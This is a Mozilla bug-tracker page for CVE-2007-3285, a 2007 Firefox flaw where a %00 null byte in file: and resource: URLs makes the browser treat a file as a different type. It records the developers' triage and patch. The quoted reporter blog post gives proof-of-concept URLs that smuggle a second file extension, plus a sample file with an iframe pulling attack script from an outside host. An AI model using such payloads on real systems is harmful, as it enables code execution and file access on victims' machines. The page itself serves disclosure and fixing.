Bug 383478 (CVE-2007-3285)

File type confusion vulnerability due to null bytes in URL (encoded as %00)

RESOLVED FIXED

Status

()

Core
Security
P1
normal
RESOLVED FIXED
10 years ago
10 years ago

People

(Reporter: Window Snyder, Assigned: dveditz)

Tracking

({fixed1.8.0.13, fixed1.8.1.5})

unspecified
x86
Windows XP
fixed1.8.0.13, fixed1.8.1.5
Points:
---
Bug Flags:
blocking1.9 +
blocking1.8.1.5 +
blocking1.8.0.13 +
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:low] file:/// not available from web, URL)

Attachments

(2 attachments)

(Reporter)

Description

10 years ago
Posted on 0x000000.com by Ronald van den Heetkamp

Firefox Remote & Local Code Excution 0day.

I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad.

Pointers that are vulnerable:

file:///
resource:

Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]

Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html

or:

resource:///README.txt%00.html

More filetypes:

file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)

This could lead to various exploits, to name a few:

- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)

Another example
It is possible to turn regular .txt stored files into full Javascript html zombies:
file:///[filelocation]/troy.txt%00.html

troy.txt could contain:

/*
Bunch of malicious Javascript
*/

Or:

<html>
<iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>


Well, I guess you get the point: nasty.


Posted on 06 06 07 by 0x000000
(Reporter)

Updated

10 years ago
Whiteboard: [sg:investigate]

Updated

10 years ago
Summary: Potential Firefox Remote & Local Code Excution 0day → File type confusion vulnerability due to null bytes in URL (encoded as %00)
The comments on that blog, and my testing, seem to indicate that this "exploit" doesn't work remotely (at least not in 2004 due to the resource:// protocol fixes).
Assignee: dveditz → nobody
Component: General → Security
QA Contact: general → firefox
(though it would be interesting to know what troy.js contains, I can't seem to access that file...)
Assignee: nobody → dveditz
We only pass things to Windows if they don't have an executable extension, but we do that test on an nsAString; see nsLocalFile::IsExecutable in nsLocalFileWin.cpp.  On the other hand, nsLocalFile::Launch passes a PRUnichar* pointer to ShellExecute, since that's what the API takes.  We should probably either disallow nulls inside nsLocalFile filenames or change IsExecutable to check the same thing that Launch() will use.  The latter is probably simpler, while the former would generally be better.
Created attachment 267724 [details] [diff] [review]
Totally untested fix to IsExecutable

We'll still lie about which helper app we'll use... but at least we'll check the IsExecutable() thing correctly.
Note that nsLocalFile::AppendInternal and nsLocalFile::InitWithPath already do some sanity checks with slashes and whatnot.  So we should probably just add similar checks for nulls.  And perhaps look at the other nsLocalFile impls too.
Component: Security → Security
Product: Firefox → Core
QA Contact: firefox → toolkit
Flags: blocking1.9?
Flags: blocking1.8.1.5?
Flags: blocking1.8.0.13?
(Assignee)

Comment 8

10 years ago
Luckily file:/// is not available from web pages, and in the limited contexts resource: is allowed (script, stylesheets, images, xbl) we ignore requests going to an external helper app.

But if you knew the location of a local file and could somehow get the user to save and execute your .html (an email attachment or other) this might work.
Whiteboard: [sg:investigate] → [sg:low] file:/// not available from web
Flags: blocking1.9? → blocking1.9+
(Assignee)

Updated

10 years ago
Flags: blocking1.8.1.5?
Flags: blocking1.8.1.5+
Flags: blocking1.8.0.13?
Flags: blocking1.8.0.13+

Updated

10 years ago
Alias: CVE-2007-3285
(Assignee)

Comment 10

10 years ago
Created attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

This stops the exploit by checking for an embedded null before creating the local file object. I'm not totally happy with it because it doesn't throw an error page they way an embedded %01 pointing at a non-existing file does, but that's rather minor.
Attachment #272054 - Flags: superreview?(bzbarsky)
Attachment #272054 - Flags: review?(cbiesinger)
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Looks OK to me, but I still wonder whether we should also fix this on the XPCOM level.
Attachment #272054 - Flags: superreview?(bzbarsky) → superreview+
(Assignee)

Comment 12

10 years ago
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Darin replied by mail: "Seems OK.  It is unfortunate that the file URL to file path conversion functions do not share some boiler-plate code that you could patch instead."
Attachment #272054 - Flags: review?(cbiesinger) → review+

Comment 13

10 years ago
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Approved for 1.8 branch, a=jay for drivers
Attachment #272054 - Flags: approval1.8.1.5+
(Assignee)

Updated

10 years ago
Keywords: fixed1.8.1.5
(Assignee)

Comment 14

10 years ago
Fix checked into trunk and branches
Keywords: fixed1.8.0.13
Flags: in-testsuite?
If this is checked-in on trunk, should it still be open?

Comment 17

10 years ago
Marking fixed, reopen if I've made a mistake.
Status: NEW → RESOLVED
Last Resolved: 10 years ago
Priority: -- → P1
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.